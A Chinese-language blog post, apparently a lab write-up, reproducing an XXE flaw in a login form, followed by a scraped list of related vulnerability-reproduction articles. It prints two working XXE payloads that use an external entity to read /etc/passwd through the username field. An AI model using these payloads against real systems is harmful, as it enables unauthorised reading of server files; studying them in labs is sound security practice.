漏洞复现之xxe漏洞
文章目录
- XXE-基础实验
- 实验内容
- 实验步骤
- 1.访问目标进行注入攻击
- 2.尝试进行登录,并进行抓包
- 3.根据xxe注入漏洞,构造payloa
- 免责声明
XXE-基础实验
实验内容
XXE(XML注入)
实验步骤
1.访问目标进行注入攻击
访问目标IP:172.16.12.2,看到以下页面
2.尝试进行登录,并进行抓包
在数据包中发送的用户名/密码是以post形式发送的,并且格式很像xml文档
3.根据xxe注入漏洞,构造payloa
只需将payload输出在username里面就行
payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY whoami SYSTEM "file:///etc//passwd">
]>
<user><username>&whoami;</username><password>123.com</password>
</user>
payload
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root> <username>&sp;</username><password>123.com</password>
</root>
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
漏洞复现之xxe漏洞相关推荐
- java 漏洞挖掘_Java XXE漏洞典型场景分析
本文首发于oppo安全应急响应中心: 0x01 前言: XML 的解析过程中若存在外部实体,若不添加安全的XML解析配置,则XML文档将包含来自外部 URI 的数据.这一行为将导致XML Extern ...
- Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞
环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...
- php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...
nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...
- CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地 ...
- 【漏洞复现】MS12-020漏洞(蓝屏攻击)复现
实验准备:win7(192.168.217.156),kali 实验步骤: 漏洞复现 打开windows远程桌面 方法:计算机–属性–远程设置 用kali查看win7已打开的端口,可以看到3389远程 ...
- 【漏洞复现】MS17-010漏洞(永恒之蓝)复现
永恒之蓝漏洞复现 漏洞复现 对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接 实验准备:win7 (192.168.217.153).win10.kali.Xshell 实验步骤: 漏洞 ...
- sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 漏洞复现专栏:https://blog.csdn.net ...
- 【漏洞复现】CVE-2020-0796漏洞复现(win10系统)
前言: Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统 ...
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...
最新文章
- c语言 北京时间转换utc时间_mysql之unix时间戳和正常时间格式之间的转换
- [android] 练习使用ListView(一)
- springmvc教程--注解开发基础详解
- 物联网是互联网发展的必然趋势吗?
- 本地服务器的音乐如何才能播放视频文件夹,mx播放器如何添加本地文件 添加本地文件设置方法...
- 余额宝上线新功能,可以跟亲朋好友一起攒钱了
- android studio 预览问题 :java.lang.NoClassDefFoundError: com/android/util/PropertiesMap
- mysql三表联合更新_mysql三表连接update
- .gitignore忽略文件提交服务器
- python获取当前时间的源代码_python怎么获取当前系统时间
- 四 Lync Server 2013 部署指南-前端部署(1)
- [BZOJ]1003 物流运输(ZJOI2006)
- 关于git远程分支操作
- 百度百科爬虫爬人物信息
- 做软件测试有发展前景吗?
- 配备透明触摸屏 看3D全息投影概念手机
- 软考高级-信息系统管理师之质量管理(最新版)
- ctab法提取dna流程图_(完整版)CTAB法提取DNA原理及步骤、制胶、电泳
- 那些年啊,那些事——一个程序员的奋斗史 ——32
- 使用tkinter加载png、jpg等图片
热门文章
- activiti并行网关(Parallel Gateway)
- 学习记录605@flowable之moveExecutionsToSingleActivityId并行网关或者包容网关回退
- 数据分析成果落地难?你需要注意这五个问题
- App数据分析的五大维度!
- OC基础----查看苹果帮助文档
- python中math计算平方根的函数_Python中Numpy和Math常用函数性能对比
- hibernate 时间模糊查询时间
- python中的zip函数索引_Python--zip()函数
- Nvidia jetson nano 配置 CUDA9 CUDNN7.1.5
- 聚集诱导发光(AIE)活性基团四苯乙烯修饰aza-BODIPY荧光染料